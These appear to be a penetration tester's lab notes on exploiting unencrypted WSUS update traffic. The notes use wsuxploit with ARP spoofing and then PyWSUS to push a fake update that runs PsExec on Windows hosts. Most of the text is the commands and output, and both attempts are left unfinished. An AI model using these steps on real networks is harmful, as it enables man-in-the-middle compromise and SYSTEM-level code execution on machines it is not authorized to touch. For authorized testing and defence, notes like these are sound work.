============================================================================================================
Abusing non-SSL WSUS traffic with wsuxploit
============================================================================================================

Scenario
----------
During an internal penetration test, you discover that the WSUS traffic in your target network (workstations & servers) uses the HTTP protocol. 
As a result you can impersonate the WSUS server using a MITM attack and get SYSTEM access to the windows targets inside of the internal (that you can 
affect with your MITM attack).


============================================================================================================
PoC 1 - Test using the tool wsuxploit
============================================================================================================

=> Source: https://github.com/pimps/wsuxploit

This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. 
It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update'.


Step 1 -  After gaining access to a workstation or server during an internal pentest, check if non-SSL WSUS traffic is enabled
-------------------------------------------------------------------------------------------------------------------------------

PS C:\> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://192.168.1.12:8535/
    
    
Step 2. Install the tool wsuxploit on a Kali
------------------------------------------------------------------------------------------------------------

┌──(kali㉿kali)-[~]
└─$ sudo apt-get install samba dsniff iptables python3
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
iptables is already the newest version (1.8.8-1).
iptables set to manually installed.
python3 is already the newest version (3.10.5-3).
python3 set to manually installed.
The following additional packages will be installed:
  libldb2 libnids1.21 libsmbclient libwbclient0 python3-ldb python3-samba samba-common samba-common-bin samba-dsdb-modules samba-libs samba-vfs-modules smbclient winexe
Suggested packages:
  bind9 bind9utils ctdb ldb-tools ntp | chrony smbldap-tools ufw winbind heimdal-clients
The following NEW packages will be installed:
  dsniff libnids1.21
The following packages will be upgraded:
  libldb2 libsmbclient libwbclient0 python3-ldb python3-samba samba samba-common samba-common-bin samba-dsdb-modules samba-libs samba-vfs-modules smbclient winexe
13 upgraded, 2 newly installed, 0 to remove and 227 not upgraded.
Need to get 13.7 MB of archives.
After this operation, 301 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsmbclient amd64 2:4.16.4+dfsg-2 [170 kB]
<snip>

──(kali㉿kali)-[~/Documents]
└─$ git clone https://github.com/pimps/wsuxploit.git
Cloning into 'wsuxploit'...
remote: Enumerating objects: 65, done.
remote: Total 65 (delta 0), reused 0 (delta 0), pack-reused 65
Receiving objects: 100% (65/65), 1.42 MiB | 2.05 MiB/s, done.
Resolving deltas: 100% (26/26), done.

┌──(kali㉿kali)-[~/Documents]
└─$ cd wsuxploit

┌──(kali㉿kali)-[~/Documents/wsuxploit]
└─$ git clone https://github.com/ctxis/wsuspect-proxy.git
Cloning into 'wsuspect-proxy'...
remote: Enumerating objects: 85, done.
remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85
Receiving objects: 100% (85/85), 128.99 KiB | 2.93 MiB/s, done.
Resolving deltas: 100% (39/39), done.


Step 3. Run the tool 'wsuxploit' to start a malicious WSUS server on your Kali, then perform a MITM attack (arp poisoning attack)
        and install malicious updates on the Windows machines of your target network
----------------------------------------------------------------------------------------------------------------------------------
                                                                                                                                                                                                                                
┌──(kali㉿kali)-[~/Documents/wsuxploit]
└─$ sudo bash wsuxploit.sh 
 __      __  _____________ _______  ___      .__         .__  __   
/  \    /  \/   _____/    |   \   \/  /_____ |  |   ____ |__|/  |_ 
\   \/\/   /\_____  \|    |   /\     /\____ \|  |  /  _ \|  \   __\ 
 \        / /        \    |  / /     \|  |_> >  |_(  <_> )  ||  |  
  \__/\  / /_______  /______/ /___/\  \   __/|____/\____/|__||__|  
       \/          \/               \_/__|                         by pimps

Usage:
wsuxploit.sh <TARGET_IP> <WSUS_IP> <WSUS_PORT> <BINARY_PATH>

Example:
wsuxploit.sh 192.168.0.101 10.0.0.85 80 /tmp/payload.exe


──(kali㉿kali)-[~/Documents/wsuxploit]
└─$ sudo bash wsuxploit.sh 192.168.1.53 192.168.1.12 8530 /tmp/maliciousupdate.exe
[sudo] password for kali: 
 __      __  _____________ _______  ___      .__         .__  __   
/  \    /  \/   _____/    |   \   \/  /_____ |  |   ____ |__|/  |_ 
\   \/\/   /\_____  \|    |   /\     /\____ \|  |  /  _ \|  \   __\ 
 \        / /        \    |  / /     \|  |_> >  |_(  <_> )  ||  |  
  \__/\  / /_______  /______/ /___/\  \   __/|____/\____/|__||__|  
       \/          \/               \_/__|                         by pimps

[*] Preparing exploit files...
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Running WSUSpect proxy...
2022-08-27 02:07:42-0400 [-] Log opened.
2022-08-27 02:07:42-0400 [-] InterceptingProxyFactory starting on 9090
2022-08-27 02:07:42-0400 [-] Starting factory <intercepting_proxy.InterceptingProxyFactory object at 0x7f92b4c07040>

2022-08-27 02:13:26-0400 [InterceptingProxy,0,192.168.1.113] Unhandled Error
        Traceback (most recent call last):

=> I got 'Unhandled Error messages'.
To complete...

============================================================================================================
PoC 2 - Test using the tool PyWSUS
============================================================================================================

=> https://github.com/GoSecure/pywsus

┌──(kali㉿kali)-[~/Documents]
└─$ git clone https://github.com/GoSecure/pywsus.git     
Cloning into 'pywsus'...
remote: Enumerating objects: 122, done.
remote: Counting objects: 100% (122/122), done.
remote: Compressing objects: 100% (94/94), done.
remote: Total 122 (delta 68), reused 64 (delta 28), pack-reused 0
Receiving objects: 100% (122/122), 29.08 KiB | 1.62 MiB/s, done.
Resolving deltas: 100% (68/68), done.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Documents]
└─$ cd pywsus 
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Documents/pywsus]
└─$ ls            
LICENSE  pywsus.py  README.md  requirements.txt  resources
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Documents/pywsus]
└─$ virtualenv -p /usr/bin/python3 ./venv
created virtual environment CPython3.10.5.final.0-64 in 570ms
  creator CPython3Posix(dest=/home/kali/Documents/pywsus/venv, clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, wheel=bundle, via=copy, app_data_dir=/home/kali/.local/share/virtualenv)
    added seed packages: pip==22.2, setuptools==59.6.0, wheel==0.37.1
  activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Documents/pywsus]
└─$ source ./venv/bin/activate
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ pip install -r ./requirements.txt
Collecting beautifulsoup4==4.9.1
  Downloading beautifulsoup4-4.9.1-py3-none-any.whl (115 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 115.1/115.1 kB 7.0 MB/s eta 0:00:00
Collecting lxml==4.6.2
  Downloading lxml-4.6.2.tar.gz (3.2 MB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 3.2/3.2 MB 20.5 MB/s eta 0:00:00
  Preparing metadata (setup.py) ... error
  error: subprocess-exited-with-error
  
  × python setup.py egg_info did not run successfully.
  │ exit code: 1
  ╰─> [3 lines of output]
      Building lxml version 4.6.2.
      Building without Cython.
      Error: Please make sure the libxml2 and libxslt development packages are installed.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
hint: See above for details.
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ ls
LICENSE  pywsus.py  README.md  requirements.txt  resources  venv
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ ls resources                                                 
get-authorization-cookie.xml  get-config.xml  get-cookie.xml  get-extended-update-info.xml  internal-error.xml  register-computer.xml  report-event-batch.xml  sync-updates.xml
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ cp ../wsuxploit/resources/PsExec.exe ./
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ ls          
LICENSE  PsExec.exe  pywsus.py  README.md  requirements.txt  resources  venv
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ sudo python pywsus.py -H 192.168.1.53 -p 8530 -c '/accepteula /s calc.exe' -e PsExec64.exe
usage: pywsus.py [-h] -H HOST [-p PORT] -e EXECUTABLE -c COMMAND [-v]
pywsus.py: error: argument -e/--executable: can't open 'PsExec64.exe': [Errno 2] No such file or directory: 'PsExec64.exe'
                                                                                                                                                                                                                                           
┌──(venv)─(kali㉿kali)-[~/Documents/pywsus]
└─$ sudo python pywsus.py -H 192.168.1.53 -p 8530 -c '/accepteula /s calc.exe' -e PsExec.exe  
INFO:root:The update metadata - uuids: [UUID('aa9df3fa-fe86-4a61-b6ac-fbfac461abd5'), UUID('e75ddf1d-801b-4441-ba90-43acdba13a90')],revision_ids: [933334, 998376], deployment_ids: [90728, 98563], executable: PsExec.exe, sha1: 5Q2eO9kZCOE6JrPiPt6vV3+zoJU=, sha256: Mzfjh1sF4L+6aauSZTLj8Xnoz78WLrtgzligKBQ3p+8=
INFO:root:Starting httpd...


To complete...

